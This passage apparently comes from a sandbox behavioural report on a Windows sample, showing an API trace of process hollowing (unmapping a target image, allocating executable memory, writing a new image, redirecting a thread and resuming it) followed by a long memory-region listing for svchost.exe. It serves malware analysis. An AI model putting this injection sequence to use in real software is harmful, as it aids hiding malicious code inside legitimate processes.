[287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0110.139] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18c06c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18c06c*, lpNumberOfBytesRead=0x0) returned 1 [0110.140] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0110.165] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0110.165] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x215a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x215a0*, NumberOfBytesWritten=0x0) returned 0x0 [0110.168] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x217a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x217a0*, NumberOfBytesWritten=0x0) returned 0x0 [0110.174] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x21654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x21654*, lpNumberOfBytesWritten=0x0) returned 1 [0110.175] SetThreadContext (hThread=0x74, lpContext=0x2a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0110.176] ResumeThread (hThread=0x74) returned 0x1 [0110.411] CloseHandle (hObject=0x74) returned 1 [0110.411] CloseHandle (hObject=0x78) returned 1 [0110.412] ExitProcess (uExitCode=0x0) [0110.412] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa807d0) returned 1 [0110.412] HeapFree (in: hHeap=0xa80000, dwFlags=0x0, lpMem=0xa807d0 | out: hHeap=0xa80000) returned 1 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa35b000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1190 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1191 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1192 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1193 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1194 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1195 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1196 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1197 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1198 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1199 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1200 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1201 start_va = 0x190000 end_va = 0x19afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1202 start_va = 0x1a0000 end_va = 0x1acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1203 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1204 start_va = 0x1c0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1205 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1206 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1207 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1208 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1209 start_va = 0x3f0000 end_va = 0x3f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1210 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1211 start_va = 0x410000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1212 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1213 start_va = 0x450000 end_va = 0x45dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1214 start_va = 0x460000 end_va = 0x467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1215 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1216 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1217 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1218 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1219 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1220 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1221 start_va = 0x8f0000 end_va = 0x90bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1222 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 1223 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1224 start_va = 0x930000 end_va = 0x930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1225 start_va = 0x940000 end_va = 0x959fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1226 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1227 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 1228 start_va = 0x980000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1229 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1230 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1231 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 1232 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1233 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1234 start_va = 0xa50000 end_va = 0xab5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1235 start_va = 0xac0000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 1236 start_va = 0xad0000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 1237 start_va = 0xae0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1238 start_va = 0xaf0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 1239 start_va = 0xb00000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 1240 start_va = 0xb10000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 1241 start_va = 0xb20000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 1242 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 1243 start_va = 0xb40000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 1244 start_va = 0xb50000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 1245 start_va = 0xbd0000 end_va = 0xe9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1246 start_va = 0xea0000 end_va = 0xea1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 1247 start_va = 0xeb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1248 start_va = 0xf30000 end_va = 0xf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1249 start_va = 0xf40000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1250 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1251 start_va = 0xfd0000 end_va = 0xfd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 1252 start_va = 0xfe0000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1253 start_va = 0x1000000 end_va = 0x1002fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1254 start_va = 0x1010000 end_va = 0x1010fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001010000" filename = "" Region: id = 1255 start_va = 0x1020000 end_va = 0x1021fff monitored = 1 entry_point = 0x0 